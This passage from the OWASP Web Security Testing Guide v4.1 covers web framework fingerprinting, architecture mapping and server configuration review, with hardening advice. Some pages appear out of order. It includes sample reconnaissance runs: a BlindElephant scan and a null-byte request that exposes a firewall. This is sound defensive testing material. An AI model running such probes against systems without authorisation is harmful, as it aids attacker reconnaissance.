lep[some_numeric_value]+sessionid</p><p>https://github.com/fuzzdb-project/fuzzdb</p><p>Web Security Testing Guide v4.1</p><p>83</p><p>Wix Domain=.wix.com</p><p>VIVVO VivvoSessionId</p><p>HTML Source Code</p><p>Application Keyword</p><p>Wordpress <meta name="generator" content="WordPress 3.9.2" /></p><p>phpBB &lt;body id=“phpbb”</p><p>Mediawiki <meta name="generator" content="MediaWiki 1.21.9" /></p><p>Joomla <meta name="generator" content="Joomla! - Open Source Content Management" /></p><p>Drupal <meta name="Generator" content="Drupal 7 (http://drupal.org)" /></p><p>DotNetNuke DNN Platform - http://www.dnnsoftware.com</p><p>Tools</p><p>A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-</p><p>based fingerprinting tools.</p><p>WhatWeb</p><p>Website: https://www.morningstarsecurity.com/research/whatweb</p><p>Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build. Language: Ruby</p><p>Matches for fingerprinting are made with:</p><p>Text strings (case sensitive)</p><p>Regular expressions</p><p>Google Hack Database queries (limited set of keywords)</p><p>MD5 hashes</p><p>URL recognition</p><p>HTML tag patterns</p><p>Custom ruby code for passive and aggressive operations</p><p>Sample output is presented on a screenshot below:</p><p>Figure 4.1.9-4: Whatweb Output Sample</p><p>http://www.dnnsoftware.com/</p><p>https://www.morningstarsecurity.com/research/whatweb</p><p>https://www.kali.org/</p><p>Web Security Testing Guide v4.1</p><p>84</p><p>BlindElephant</p><p>Website:http://blindelephant.sourceforge.net/</p><p>This great tool works on the principle of static file checksum based version difference thus providing a very high quality</p><p>of fingerprinting. Language: Python</p><p>Sample output of a successful fingerprint:</p><p>pentester$ python BlindElephant.py http://my_target drupal</p><p>Loaded /Library/Python/2.7/site-packages/blindelephant/dbs/drupal.pkl with 145 versions, 478</p><p>differentiating paths, and 434 version groups.</p><p>Starting BlindElephant fingerprint for version of drupal at http://my_target</p><p>Hit http://my_target/CHANGELOG.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint.</p><p>527b085a3717bd691d47713dff74acf4</p><p>Hit http://my_target/INSTALL.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint.</p><p>14dfc133e4101be6f0ef5c64566da4a4</p><p>Hit http://my_target/misc/drupal.js</p><p>Possible versions based on result: 7.12, 7.13, 7.14</p><p>Hit http://my_target/MAINTAINERS.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint.</p><p>36b740941a19912f3fdbfcca7caa08ca</p><p>Hit http://my_target/themes/garland/style.css</p><p>Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13,</p><p>7.14</p><p>...</p><p>Fingerprinting resulted in:</p><p>7.14</p><p>Best Guess: 7.14</p><p>Wappalyzer</p><p>Website: https://www.wappalyzer.com/</p><p>Wapplyzer is a Firefox Chrome extension. It works only on regular expression matching and doesn’t need anything</p><p>other than the page to be loaded on browser. It works completely at the browser level and gives results in the form of</p><p>icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to</p><p>construct a target website immediately after browsing a page.</p><p>Note that by default, Wappalyzer will send anonymised data about the technology running on visited websites back to</p><p>the developers, which is then sold to third parties. Make sure you disable this data collection in the add-on options.</p><p>Sample output of a plug-in is presented on a screenshot below.</p><p>http://blindelephant.sourceforge.net/</p><p>https://www.wappalyzer.com/</p><p>Web Security Testing Guide v4.1</p><p>85</p><p>Figure 4.1.9-5: Wappalyzer Output for OWASP Website</p><p>References</p><p>Whitepapers</p><p>Saumil Shah: “An Introduction to HTTP fingerprinting”</p><p>Anant Shrivastava : “Web Application Finger Printing”</p><p>Remediation</p><p>The general advice is to use several of the tools described above and check logs to better understand what exactly</p><p>helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide</p><p>framework tracks, it’s possible to achieve a better level of security and to make sure of the framework can not be</p><p>detected by automatic scans. Below are some specific recommendations by framework marker location and some</p><p>additional interesting approaches.</p><p>HTTP Headers</p><p>Check the configuration and disable or obfuscate all HTTP-headers that disclose information the technologies used.</p><p>Here is an interesting article about HTTP-headers obfuscation using Netscaler</p><p>Cookies</p><p>It is recommended to change cookie names by making changes in the corresponding configuration files.</p><p>HTML Source Code</p><p>Manually check the contents of the HTML code and remove everything that explicitly points to the framework.</p><p>General guidelines:</p><p>Make sure there are no visual markers disclosing the framework</p><p>Remove any unnecessary comments (copyrights, bug information, specific framework comments)</p><p>Remove META and generator tags</p><p>Use the companies own CSS or JS files and do not store those in a framework-specific folders</p><p>Do not use default scripts on the page or obfuscate them if they must be used.</p><p>Specific Files and Folders</p><p>General guidelines:</p><p>Remove any unnecessary or unused files on the server. This implies text files disclosing information about</p><p>versions and installation too.</p><p>Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be</p><p>done, for example, by modifying htaccess file and adding RewriteCond or RewriteRule there. An example of such</p><p>https://web.archive.org/web/20190526182734/https://net-square.com/httprint_paper.html</p><p>https://anantshri.info/articles/web_app_finger_printing.html</p><p>Web Security Testing Guide v4.1</p><p>86</p><p>restriction for two common WordPress folders is presented below.</p><p>RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR]</p><p>RewriteCond %{REQUEST_URI} /wp-admin/$</p><p>RewriteRule $ /http://your_website [R=404,L]</p><p>However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific</p><p>plugins exist. One example for WordPress is StealthLogin.</p><p>Additional Approaches</p><p>General guidelines:</p><p>Checksum management The purpose of this approach is to beat checksum-based scanners and not let them</p><p>disclose files by their hashes. Generally, there are two approaches in checksum management:</p><p>Change the location of where those files are placed (i.e. move them to another folder, or rename the existing</p><p>folder)</p><p>Modify the contents - even slight modification results in a completely different hash sum, so adding a single</p><p>byte in the end of the file should not be a big problem.</p><p>Controlled chaos A funny and effective method that involves adding bogus files and folders from other frameworks</p><p>in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders and to</p><p>break the current framework!</p><p>https://wordpress.org/plugins/stealth-login-page</p><p>Web Security Testing Guide v4.1</p><p>87</p><p>Map Application Architecture</p><p>ID</p><p>WSTG-INFO-10</p><p>Summary</p><p>The complexity of interconnected and heterogeneous web server infrastructure can include hundreds of web</p><p>applications and makes configuration management and review a fundamental step in testing and deploying every</p><p>single application. In fact it takes only a single vulnerability to undermine the security of the entire infrastructure, and</p><p>even small and seemingly unimportant problems may evolve into severe risks for another application on the same</p><p>server.</p><p>To address these problems, it is of utmost importance to perform an in-depth review of configuration and known security</p><p>issues. Before performing an in-depth review it is necessary to map the network and application architecture. The</p><p>different elements that make up the infrastructure need to be determined to understand how they interact with a web</p><p>application and how they affect security.</p><p>How to Test</p><p>Map the Application Architecture</p><p>The application architecture needs to be mapped through some test to determine what different components are used</p><p>to build the web application. In small setups, such as a simple CGI-based application, a single server might be used</p><p>that runs the web server which executes the C, Perl, or Shell CGIs application, and perhaps also the authentication</p><p>mechanism.</p><p>On more complex setups, such as an online bank system, multiple servers might be involved. These may include a</p><p>reverse proxy, a front-end web server, an application server and a database server or LDAP server. Each of these</p><p>servers will be used for different purposes and might be even be divided in different networks with firewalls between</p><p>them. This creates different DMZs so that access to the web server will not grant a remote user access to the</p><p>authentication mechanism itself, and so that compromises of the different elements of the architecture can be isolated</p><p>so that they will not compromise the whole architecture.</p><p>Getting knowledge of the application architecture can be easy if this information is provided to the testing team by the</p><p>application developers in document form or through interviews, but can also prove to be very difficult if doing a blind</p><p>penetration test.</p><p>In the latter case, a tester will first start with the assumption that there is a simple setup (a single server). Then they will</p><p>retrieve information from other tests and derive the different elements, question this assumption and extend the</p><p>architecture map. The tester will start by asking simple questions such as: “Is there a firewalling system protecting the</p><p>web server?”. This question will be answered based on the results of network scans targeted at the web server and the</p><p>analysis of whether the network ports of the web server are being filtered in the network edge (no answer or ICMP</p><p>unreachables are received) or if the server is directly connected to the Internet (i.e. returns RST packets for all non-</p><p>listening ports). This analysis can be enhanced to determine the type of firewall used based on network packet tests. Is</p><p>it a stateful firewall or is it an access list filter on a router? How is it configured? Can it be bypassed?</p><p>Detecting a reverse proxy in front of the web server needs to be done by the analysis of the web server banner, which</p><p>might directly disclose the existence of a reverse proxy (for example, if ‘WebSEAL’ is returned). It can also be</p><p>determined by obtaining the answers given by the web server to requests and comparing them to the expected</p><p>answers. For example, some reverse proxies act as “intrusion prevention systems” (or web-shields) by blocking known</p><p>attacks targeted at the web server. If the web server is known to answer with a 404 message to a request that targets an</p><p>unavailable page and returns a different error message for some common web attacks like those done by CGI</p><p>https://publib.boulder.ibm.com/tividd/td/ITAME/SC32-1359-00/en_US/HTML/am51_webseal_guide11.htm#i1038108</p><p>Web Security Testing Guide v4.1</p><p>88</p><p>scanners, it might be an indication of a reverse proxy (or an application-level firewall) which is filtering the requests and</p><p>returning a different error page than the one expected. Another example: if the web server returns a set of available</p><p>HTTP methods (including TRACE) but the expected methods return errors then there is probably something in between</p><p>blocking them.</p><p>In some cases, even the protection system gives itself away:</p><p>GET /web-console/ServerInfo.jsp%00 HTTP/1.0</p><p>HTTP/1.0 200</p><p>Pragma: no-cache</p><p>Cache-Control: no-cache</p><p>Content-Type: text/html</p><p>Content-Length: 83</p><p><TITLE>Error</TITLE></p><p><BODY></p><p><H1>Error</H1></p><p>FW-1 at XXXXXX: Access denied.</BODY></p><p>Example of the Security Server of Check Point Firewall-1 NG AI “Protecting” a Web Server</p><p>Reverse proxies can also be introduced as proxy-caches to accelerate the performance of back-end application</p><p>servers. Detecting these proxies can be done based on the server header. They can also be detected by timing</p><p>requests that should be cached by the server and comparing the time taken to server the first request with subsequent</p><p>requests.</p><p>Another element that can be detected is network load balancers. Typically, these systems will balance a given TCP/IP</p><p>port to multiple servers based on different algorithms (round-robin, web server load, number of requests, etc.). Thus, the</p><p>detection of this architecture element needs to be done by examining multiple requests and comparing results to</p><p>determine if the requests are going to the same or different web servers. For example, based on the Date header if the</p><p>server clocks are not synchronized. In some cases, the network load balance process might inject new information in</p><p>the headers that will make it stand out distinctively, like the AlteonP cookie introduced by Nortel’s Alteon WebSystems</p><p>load balancer.</p><p>Application web servers are usually easy to detect. The request for several resources is handled by the application</p><p>server itself (not the web server) and the response header will vary significantly (including different or additional values</p><p>in the answer header). Another way to detect these is to see if the web server tries to set cookies which are indicative of</p><p>an application web server being used (such as the JSESSIONID provided by some J2EE servers), or to rewrite URLs</p><p>automatically to do session tracking.</p><p>Authentication back ends (such as LDAP directories, relational databases, or RADIUS servers) however, are not as</p><p>easy to detect from an external point of view in an immediate way, since they will be hidden by the application itself.</p><p>The use of a back end database can be determined simply by navigating an application. If there is highly dynamic</p><p>content generated “on the fly,” it is probably being extracted from some sort of database by the application itself.</p><p>Sometimes the way information is requested might give insight to the existence of a database back-end. For example,</p><p>an online shopping application that uses numeric identifiers (‘id’) when browsing the different</p><p>articles in the shop.</p><p>However, when doing a blind application test, knowledge of the underlying database is usually only available when a</p><p>vulnerability surfaces in the application, such as poor exception handling or susceptibility to SQL injection.</p><p>Web Security Testing Guide v4.1</p><p>89</p><p>4.2 Configuration and Deployment Management Testing</p><p>4.2.1 Test Network Infrastructure Configuration</p><p>4.2.2 Test Application Platform Configuration</p><p>4.2.3 Test File Extensions Handling for Sensitive Information</p><p>4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information</p><p>4.2.5 Enumerate Infrastructure and Application Admin Interfaces</p><p>4.2.6 Test HTTP Methods</p><p>4.2.7 Test HTTP Strict Transport Security</p><p>4.2.8 Test RIA Cross Domain Policy</p><p>4.2.9 Test File Permission</p><p>4.2.10 Test for Subdomain Takeover</p><p>4.2.11 Test Cloud Storage</p><p>Web Security Testing Guide v4.1</p><p>90</p><p>Test Network Infrastructure Configuration</p><p>ID</p><p>WSTG-CONF-01</p><p>Summary</p><p>The intrinsic complexity of interconnected and heterogeneous web server infrastructure, which can include hundreds of</p><p>web applications, makes configuration management and review a fundamental step in testing and deploying every</p><p>single application. It takes only a single vulnerability to undermine the security of the entire infrastructure, and even</p><p>small and seemingly unimportant problems may evolve into severe risks for another application on the same server. In</p><p>order to address these problems, it is of utmost importance to perform an in-depth review of configuration and known</p><p>security issues, after having mapped the entire architecture.</p><p>Proper configuration management of the web server infrastructure is very important in order to preserve the security of</p><p>the application itself. If elements such as the web server software, the back-end database servers, or the authentication</p><p>servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities</p><p>that might compromise the application itself.</p><p>For example, a web server vulnerability that would allow a remote attacker to disclose the source code of the</p><p>application itself (a vulnerability that has arisen a number of times in both web servers or application servers) could</p><p>compromise the application, as anonymous users could use the information disclosed in the source code to leverage</p><p>attacks against the application or its users.</p><p>The following steps need to be taken to test the configuration management infrastructure:</p><p>The different elements that make up the infrastructure need to be determined in order to understand how they</p><p>interact with a web application and how they affect its security.</p><p>All the elements of the infrastructure need to be reviewed in order to make sure that they don’t contain any known</p><p>vulnerabilities.</p><p>A review needs to be made of the administrative tools used to maintain all the different elements.</p><p>The authentication systems, need to reviewed in order to assure that they serve the needs of the application and</p><p>that they cannot be manipulated by external users to leverage access.</p><p>A list of defined ports which are required for the application should be maintained and kept under change control.</p><p>After having mapped the different elements that make up the infrastructure (see Map Network and Application</p><p>Architecture) it is possible to review the configuration of each element founded and test for any known vulnerabilities.</p><p>Test Objectives</p><p>Map the infrastructure supporting the application and understand how it affects the security of the application.</p><p>How to Test</p><p>Known Server Vulnerabilities</p><p>Vulnerabilities found in the different areas of the application architecture, be it in the web server or in the back end</p><p>database, can severely compromise the application itself. For example, consider a server vulnerability that allows a</p><p>remote, unauthenticated user to upload files to the web server or even to replace files. This vulnerability could</p><p>compromise the application, since a rogue user may be able to replace the application itself or introduce code that</p><p>would affect the back end servers, as its application code would be run just like any other application.</p><p>Web Security Testing Guide v4.1</p><p>91</p><p>Reviewing server vulnerabilities can be hard to do if the test needs to be done through a blind penetration test. In these</p><p>cases, vulnerabilities need to be tested from a remote site, typically using an automated tool. However, testing for some</p><p>vulnerabilities can have unpredictable results on the web server, and testing for others (like those directly involved in</p><p>denial of service attacks) might not be possible due to the service downtime involved if the test was successful.</p><p>Some automated tools will flag vulnerabilities based on the web server version retrieved. This leads to both false</p><p>positives and false negatives. On one hand, if the web server version has been removed or obscured by the local site</p><p>administrator the scan tool will not flag the server as vulnerable even if it is. On the other hand, if the vendor providing</p><p>the software does not update the web server version when vulnerabilities are fixed, the scan tool will flag vulnerabilities</p><p>that do not exist. The latter case is actually very common as some operating system vendors back port patches of</p><p>security vulnerabilities to the software they provide in the operating system, but do not do a full upload to the latest</p><p>software version. This happens in most GNU/Linux distributions such as Debian, Red Hat or SuSE. In most cases,</p><p>vulnerability scanning of an application architecture will only find vulnerabilities associated with the “exposed”</p><p>elements of the architecture (such as the web server) and will usually be unable to find vulnerabilities associated to</p><p>elements which are not directly exposed, such as the authentication back ends, the back end database, or reverse</p><p>proxies in use.</p><p>Finally, not all software vendors disclose vulnerabilities in a public way, and therefore these weaknesses do not</p><p>become registered within publicly known vulnerability databases [2]. This information is only disclosed to customers or</p><p>published through fixes that do not have accompanying advisories. This reduces the usefulness of vulnerability</p><p>scanning tools. Typically, vulnerability coverage of these tools will be very good for common products (such as the</p><p>Apache web server, Microsoft’s Internet Information Server, or IBM’s Lotus Domino) but will be lacking for lesser known</p><p>products.</p><p>This is why reviewing vulnerabilities is best done when the tester is provided with internal information of the software</p><p>used, including versions and releases used and patches applied to the software. With this information, the tester can</p><p>retrieve the information from the vendor itself and analyze what vulnerabilities might be present in the architecture and</p><p>how they can affect the application itself. When possible, these vulnerabilities can be tested to determine their real</p><p>effects and to detect if there might be any external elements (such as intrusion detection or prevention systems) that</p><p>might reduce or negate the possibility of successful exploitation. Testers might even determine, through a configuration</p><p>review, that the vulnerability is not even present, since it affects a software component that is not in use.</p><p>It is also worthwhile to note that vendors will sometimes silently fix vulnerabilities and make the fixes available with new</p><p>software releases. Different vendors will have different release cycles that determine the support they might provide for</p><p>older releases. A tester with detailed information of the software versions used by the architecture can analyse the risk</p><p>associated to the use of old software releases that might be unsupported in the short term or are already unsupported.</p><p>This is critical, since if a vulnerability were to surface in an old software version that is no longer supported, the systems</p><p>personnel might not be directly aware of it. No patches will be ever made available for it and advisories might not list</p><p>that version as vulnerable</p><p>as it is no longer supported. Even in the event that they are aware that the vulnerability is</p><p>present and the system is vulnerable, they will need to do a full upgrade to a new software release, which might</p><p>introduce significant downtime in the application architecture or might force the application to be re-coded due to</p><p>incompatibilities with the latest software version.</p><p>Administrative Tools</p><p>Any web server infrastructure requires the existence of administrative tools to maintain and update the information used</p><p>by the application. This information includes static content (web pages, graphic files), application source code, user</p><p>authentication databases, etc. Administrative tools will differ depending on the site, technology, or software used. For</p><p>example, some web servers will be managed using administrative interfaces which are, themselves, web servers (such</p><p>as the iPlanet web server) or will be administrated by plain text configuration files (in the Apache case [3]) or use</p><p>operating-system GUI tools (when using Microsoft’s IIS server or ASP.Net).</p><p>In most cases the server configuration will be handled using different file maintenance tools used by the web server,</p><p>which are managed through FTP servers, WebDAV, network file systems (NFS, CIFS) or other mechanisms. Obviously,</p><p>the operating system of the elements that make up the application architecture will also be managed using other tools.</p><p>Web Security Testing Guide v4.1</p><p>92</p><p>Applications may also have administrative interfaces embedded in them that are used to manage the application data</p><p>itself (users, content, etc.).</p><p>After having mapped the administrative interfaces used to manage the different parts of the architecture it is important to</p><p>review them since if an attacker gains access to any of them he can then compromise or damage the application</p><p>architecture. To do this it is important to:</p><p>Determine the mechanisms that control access to these interfaces and their associated susceptibilities. This</p><p>information may be available online.</p><p>Change the default username and password.</p><p>Some companies choose not to manage all aspects of their web server applications, but may have other parties</p><p>managing the content delivered by the web application. This external company might either provide only parts of the</p><p>content (news updates or promotions) or might manage the web server completely (including content and code). It is</p><p>common to find administrative interfaces available from the Internet in these situations, since using the Internet is</p><p>cheaper than providing a dedicated line that will connect the external company to the application infrastructure through</p><p>a management-only interface. In this situation, it is very important to test if the administrative interfaces can be</p><p>vulnerable to attacks.</p><p>References</p><p>[1] WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli</p><p>framework.</p><p>[2] Such as Symantec’s Bugtraq, ISS’ X-Force, or NIST’s National Vulnerability Database (NVD).</p><p>[3] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use</p><p>yet.</p><p>Web Security Testing Guide v4.1</p><p>93</p><p>Test Application Platform Configuration</p><p>ID</p><p>WSTG-CONF-02</p><p>Summary</p><p>Proper configuration of the single elements that make up an application architecture is important in order to prevent</p><p>mistakes that might compromise the security of the whole architecture.</p><p>Configuration review and testing is a critical task in creating and maintaining an architecture. This is because many</p><p>different systems will be usually provided with generic configurations that might not be suited to the task they will</p><p>perform on the specific site they’re installed on.</p><p>While the typical web and application server installation will contain a lot of functionality (like application examples,</p><p>documentation, test pages) what is not essential should be removed before deployment to avoid post-install</p><p>exploitation.</p><p>How to Test</p><p>Black-Box Testing</p><p>Sample and Known Files and Directories</p><p>Many web servers and application servers provide, in a default installation, sample applications and files for the benefit</p><p>of the developer and in order to test that the server is working properly right after installation. However, many default</p><p>web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999-0449</p><p>(Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal</p><p>vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-</p><p>2003-1172 (Directory traversal in the view-source sample in Apache’s Cocoon).</p><p>CGI scanners include a detailed list of known files and directory samples that are provided by different web or</p><p>application servers and might be a fast way to determine if these files are present. However, the only way to be really</p><p>sure is to do a full review of the contents of the web server or application server and determine of whether they are</p><p>related to the application itself or not.</p><p>Comment Review</p><p>It is very common for programmers to add comments when developing large web-based applications. However,</p><p>comments included inline in HTML code might reveal internal information that should not be available to an attacker.</p><p>Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked</p><p>out to the HTML pages returned to the users unintentionally.</p><p>Comment review should be done in order to determine if any information is being leaked through comments. This</p><p>review can only be thoroughly done through an analysis of the web server static and dynamic content and through file</p><p>searches. It can be useful to browse the site either in an automatic or guided fashion and store all the content retrieved.</p><p>This retrieved content can then be searched in order to analyse any HTML comments available in the code.</p><p>System Configuration</p><p>CIS-CAT gives IT and security professionals a fast, detailed assessment of target systems’ conformance to CIS</p><p>Benchmarks. CIS also provides the recommended system configuration hardening guide including database, OS, Web</p><p>server, visualization.</p><p>1 CIS Benchmarks</p><p>2 CIS Benchmarks Downloads</p><p>https://www.cisecurity.org/cis-benchmarks/</p><p>https://learn.cisecurity.org/benchmarks</p><p>Web Security Testing Guide v4.1</p><p>94</p><p>Gray-Box Testing</p><p>Configuration Review</p><p>The web server or application server configuration takes an important role in protecting the contents of the site and it</p><p>must be carefully reviewed in order to spot common configuration mistakes. Obviously, the recommended configuration</p><p>varies depending on the site policy, and the functionality that should be provided by the server software. In most cases,</p><p>however, configuration guidelines (either provided by the software vendor or external parties) should be followed to</p><p>determine if the server has been properly secured.</p><p>It is impossible to generically say how a server should be configured, however, some common guidelines should be</p><p>taken into account:</p><p>Only enable server modules (ISAPI extensions in the case of IIS) that are needed for the application. This reduces</p><p>the attack surface since the server is reduced in size and complexity as software modules are disabled. It also</p><p>prevents vulnerabilities that might appear in the vendor software from affecting the site if they are only present in</p><p>modules that have been already disabled.</p><p>Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages.</p><p>Specifically make sure that any application errors will not be returned to the end-user and that no code is leaked</p><p>through these errors since it will help an attacker. It is actually very common to forget this point since developers do</p><p>need this information in pre-production environments.</p><p>Make sure that the server software runs with minimized privileges in the operating system. This prevents an error in</p><p>the server software from directly compromising the</p><p>and company names may be trademarks of their respective owners. Use of a term in this document</p><p>should not be regarded as affecting the validity of any trademark or service mark.</p><p>Contacting OWASP</p><p>Contact details for the OWASP Foundation are available online. If you have a question concerning a particular project,</p><p>we strongly recommend using the Google Group for that project. Many questions can also be answered by searching</p><p>the OWASP web site, so please check there first.</p><p>Follow Us</p><p>Follow @owasp_wstgFollow @owasp_wstg 296296</p><p>https://owasp.org/</p><p>https://owasp.org/contact/</p><p>https://groups.google.com/a/owasp.org/forum/</p><p>https://owasp.org/</p><p>https://www.linkedin.com/company/owasp/</p><p>https://twitter.com/owasp_wstg</p><p>Web Security Testing Guide v4.1</p><p>9</p><p>Introduction</p><p>The OWASP Testing Project</p><p>The OWASP Testing Project has been in development for many years. The aim of the project is to help people</p><p>understand the what, why, when, where, and how of testing web applications. The project has delivered a complete</p><p>testing framework, not merely a simple checklist or prescription of issues that should be addressed. Readers can use</p><p>this framework as a template to build their own testing programs or to qualify other people’s processes. The Testing</p><p>Guide describes in detail both the general testing framework and the techniques required to implement the framework</p><p>in practice.</p><p>Writing the Testing Guide has proven to be a difficult task. It was a challenge to obtain consensus and develop content</p><p>that allowed people to apply the concepts described in the guide, while also enabling them to work in their own</p><p>environment and culture. It was also a challenge to change the focus of web application testing from penetration testing</p><p>to testing integrated in the software development life cycle.</p><p>However, the group is very satisfied with the results of the project. Many industry experts and security professionals,</p><p>some of whom are responsible for software security at some of the largest companies in the world, are validating the</p><p>testing framework. This framework helps organizations test their web applications in order to build reliable and secure</p><p>software. The framework does not simply highlight areas of weakness, although the latter is certainly a by-product of</p><p>many of the OWASP guides and checklists. As such, hard decisions had to be made about the appropriateness of</p><p>certain testing techniques and technologies. The group fully understands that not everyone will agree upon all of these</p><p>decisions. However, OWASP is able to take the high ground and change culture over time through awareness and</p><p>education based on consensus and experience.</p><p>The rest of this guide is organized as follows: this introduction covers the pre-requisites of testing web applications and</p><p>the scope of testing. It also covers the principles of successful testing and testing techniques, best practices for</p><p>reporting, and business cases for security testing. Chapter 3 presents the OWASP Testing Framework and explains its</p><p>techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to</p><p>test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing.</p><p>Measuring Security: the Economics of Insecure Software</p><p>A basic tenet of software engineering is summed up in a quote from Controlling Software Projects: Management,</p><p>Measurement, and Estimates by Tom DeMarco:</p><p>You can’t control what you can’t measure.</p><p>Security testing is no different. Unfortunately, measuring security is a notoriously difficult process.</p><p>One aspect that should be emphasized is that security measurements are about both the specific technical issues (e.g.,</p><p>how prevalent a certain vulnerability is) and how these issues affect the economics of software. Most technical people</p><p>will at least understand the basic issues, or they may have a deeper understanding of the vulnerabilities. Sadly, few are</p><p>able to translate that technical knowledge into monetary terms and quantify the potential cost of vulnerabilities to the</p><p>application owner’s business. Until this happens, CIOs will not be able to develop an accurate return on security</p><p>investment and, subsequently, assign appropriate budgets for software security. While estimating the cost of insecure</p><p>software may appear a daunting task, there has been a significant amount of work in this direction. For example, in</p><p>June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US</p><p>economy due to inadequate software testing. Interestingly, they estimate that a better testing infrastructure would save</p><p>more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security</p><p>have been studied by academic researchers. Ross Andrerson’s page on economics and security has more information</p><p>about some of these efforts.</p><p>https://isbnsearch.org/isbn/9780131717114</p><p>https://en.wikiquote.org/wiki/Tom_DeMarco</p><p>https://www.nist.gov/director/planning/upload/report02-3.pdf</p><p>https://www.cl.cam.ac.uk/~rja14/econsec.html</p><p>Web Security Testing Guide v4.1</p><p>10</p><p>The framework described in this document encourages people to measure security throughout the entire development</p><p>process. They can then relate the cost of insecure software to the impact it has on the business, and consequently</p><p>develop appropriate business processes and assign resources to manage the risk. Remember that measuring and</p><p>testing web applications is even more critical than for other software, since web applications are exposed to millions of</p><p>users through the Internet.</p><p>What is Testing?</p><p>Many things need to be tested during the development life cycle of a web application, but what does testing actually</p><p>mean? The Oxford Dictionary of English defines “test” as:</p><p>test (noun): a procedure intended to establish the quality, performance, or reliability of something, especially</p><p>before it is taken into widespread use.</p><p>For the purposes of this document, testing is a process of comparing the state of a system or application against a set of</p><p>criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor</p><p>complete. As a result of this, many outsiders regard security testing as a black art. The aim of this document is to</p><p>change that perception, and to make it easier for people without in-depth security knowledge to make a difference in</p><p>testing.</p><p>Why Perform Testing?</p><p>This document is designed to help organizations understand what comprises a testing program, and to help them</p><p>identify the steps that need to be undertaken to build and operate a testing program on web applications. The guide</p><p>gives a broad view of the elements required to make a comprehensive web application security program. This guide</p><p>can be used as a reference guide and as a methodology to help determine the gap between existing practices and</p><p>industry best practices. This guide allows organizations to compare themselves against industry peers, to understand</p><p>the magnitude of resources required to test and maintain software, or to prepare for an audit. This chapter does not go</p><p>into the technical details of how to test an application, as the intent is to provide a typical security organizational</p><p>framework. The technical details about how to test an application, as part of a penetration test or code review, will be</p><p>covered in the remaining parts of this document.</p><p>When to Test?</p><p>Most people today don’t test software until it has already been created and is in the deployment phase of its life cycle</p><p>(i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and</p><p>cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is</p><p>to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a</p><p>structure imposed on the development of software artifacts. If an SDLC is not currently being</p><p>whole system, although an attacker could elevate privileges</p><p>once running code as the web server.</p><p>Make sure the server software properly logs both legitimate access and errors.</p><p>Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure</p><p>that the server has been performance-tuned properly.</p><p>Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc ) access to</p><p>applicationHost.config, redirection.config, and administration.config (either Read or Write access). This includes</p><p>Network Service , IIS_IUSRS , IUSR , or any custom identity used by IIS application pools. IIS worker processes</p><p>are not meant to access any of these files directly.</p><p>Never share out applicationHost.config, redirection.config, and administration.config on the network. When using</p><p>Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting</p><p>Permissions for Shared Configuration).</p><p>Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do</p><p>not store sensitive information in these files if it should be for administrator eyes only.</p><p>Encrypt sensitive information that should be read by the IIS worker processes only and not by other users on the</p><p>machine.</p><p>Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config .</p><p>This identity should have only Read access.</p><p>Use a separate identity to publish applicationHost.config to the share. Do not use this identity for configuring</p><p>access to the shared configuration on the Web servers.</p><p>Use a strong password when exporting the encryption keys for use with shared -configuration.</p><p>Maintain restricted access to the share containing the shared configuration and encryption keys. If this share is</p><p>compromised, an attacker will be able to read and write any IIS configuration for your Web servers, redirect traffic</p><p>from your Web site to malicious sources, and in some cases gain control of all web servers by loading arbitrary</p><p>code into IIS worker processes.</p><p>Consider protecting this share with firewall rules and IPsec policies to allow only the member web servers to</p><p>connect.</p><p>Logging</p><p>Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in</p><p>applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue</p><p>users. Logs are typically properly generated by web and other server software. It is not common to find applications that</p><p>Web Security Testing Guide v4.1</p><p>95</p><p>properly log their actions to a log and, when they do, the main intention of the application logs is to produce debugging</p><p>output that could be used by the programmer to analyze a particular error.</p><p>In both cases (server and application logs) several issues should be tested and analyzed based on the log contents:</p><p>1. Do the logs contain sensitive information?</p><p>2. Are the logs stored in a dedicated server?</p><p>3. Can log usage generate a Denial of Service condition?</p><p>4. How are they rotated? Are logs kept for the sufficient time?</p><p>5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?</p><p>6. How are log backups preserved?</p><p>7. Is the data being logged data validated (min/max length, chars etc) prior to being logged?</p><p>Sensitive Information in Logs</p><p>Some applications might, for example, use GET requests to forward form data which will be seen in the server logs.</p><p>This means that server logs might contain sensitive information (such as usernames as passwords, or bank account</p><p>details). This sensitive information can be misused by an attacker if they obtained the logs, for example, through</p><p>administrative interfaces or known web 